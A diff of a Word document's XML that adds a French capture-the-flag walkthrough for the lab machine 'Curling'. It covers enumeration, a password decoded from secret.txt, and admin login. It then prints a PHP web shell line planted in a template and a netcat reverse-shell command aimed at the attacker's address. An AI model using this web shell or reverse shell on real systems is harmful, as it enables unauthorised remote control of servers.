--- a/Facile/[easy] Curling.docx
+++ b/Facile/[easy] Curling.docx
@@ -132,9 +132,220 @@
         <w:t>Enumération initiale</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nous commençons par l’énumération des ports et services ouverts avec </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Nmap -T4 -A 10.10.10.150</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4744255B" wp14:editId="134F215B">
+            <wp:extent cx="5760720" cy="1826895"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="2" name="Image 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1826895"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Pour l’énumération initiale, nous allons également faire l’énumération du site web</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> avec </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>dirsearch</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="1599"/>
+              </w:tabs>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>$ dirsearc</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>h -x 403 -w wordlist -f</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -t 100 -e </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>html,php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>" -u http://10.10.10.150/</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E1E03B" wp14:editId="1E5ABB70">
+            <wp:extent cx="5099395" cy="4211273"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="5" name="Image 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5106664" cy="4217276"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -177,9 +388,1091 @@
         <w:t>Obtenir un accès utilisateur</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Bla</w:t>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">En visitant manuellement le site, les 3 articles qui apparaissent sont </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">publié par l’utilisateur </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Super User</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, il y a un article signé par </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Floris</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. En regardant la source HTML, nous pouvons voir quelque chose d’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>intéressant</w:t>
+      </w:r>
+      <w:r>
+        <w:t> :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="211D86A3" wp14:editId="04C2E3F9">
+            <wp:extent cx="1838325" cy="485775"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="3" name="Image 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1838325" cy="485775"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3602BC31" wp14:editId="21FA7D6B">
+            <wp:extent cx="3867150" cy="942975"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="4" name="Image 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3867150" cy="942975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nous testons de le décoder en base 64 :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$ curl -s </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId10" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Lienhypertexte"/>
+                  <w:lang w:val="en-US"/>
+                </w:rPr>
+                <w:t>http://10.10.10.150/secret.txt</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> | base64 -d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CB10FF9" wp14:editId="3FBEA816">
+            <wp:extent cx="5715000" cy="514350"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="Image 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="514350"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nous avons un mot d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">e passe : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Curling</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2018!</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">En nous rendant sur la page </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://10.10.10.150/administrator/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> nous pouvons nous logger avec l’utilisateur Floris :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A9DF17" wp14:editId="6DE05FD3">
+            <wp:extent cx="3028950" cy="2714625"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="7" name="Image 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3028950" cy="2714625"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E3E664" wp14:editId="26E18D5D">
+            <wp:extent cx="5760720" cy="1543050"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="8" name="Image 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1543050"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Pour avoir une RCE à partir de là, la manipulation va consister à rajouter un paramètre sur une page web déjà présente afin de passer des commandes </w:t>
+      </w:r>
+      <w:r>
+        <w:t>pour obtenir une RCE :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sur le home, à gauche, il faut aller dans </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>template</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, puis </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>template</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, cliquer sur une page et rajouter le code PHP pour rajouter un paramètre :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>System($_REQUEST[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>'cmd</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:t>]) ;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:r>
+        <w:t>Cela fonctionne :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15BACABA" wp14:editId="39FFFAAB">
+            <wp:extent cx="5391150" cy="2933700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="Image 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5391150" cy="2933700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Maintenant nous mettons en place un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>listener</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> sur kali et nous </w:t>
+      </w:r>
+      <w:r>
+        <w:t>exécutons</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> le code bash suivant :</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grilledutableau"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9062"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9062" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
+          </w:tcPr>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Curl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId16" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Lienhypertexte"/>
+                </w:rPr>
+                <w:t>http://10.10.10.150/index.php</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t xml:space="preserve"> -G --data-urlencode </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>'cmd=</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>rm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>f;mkfifo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>f;cat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/f|/bin/sh -i 2&gt;&amp;1|n</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>c 10.10.14.37 4444 &gt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>tmp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:cstheme="minorHAnsi"/>
+              </w:rPr>
+              <w:t>/f</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7203315B" wp14:editId="04AF62E0">
+            <wp:extent cx="5760720" cy="1294765"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="10" name="Image 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
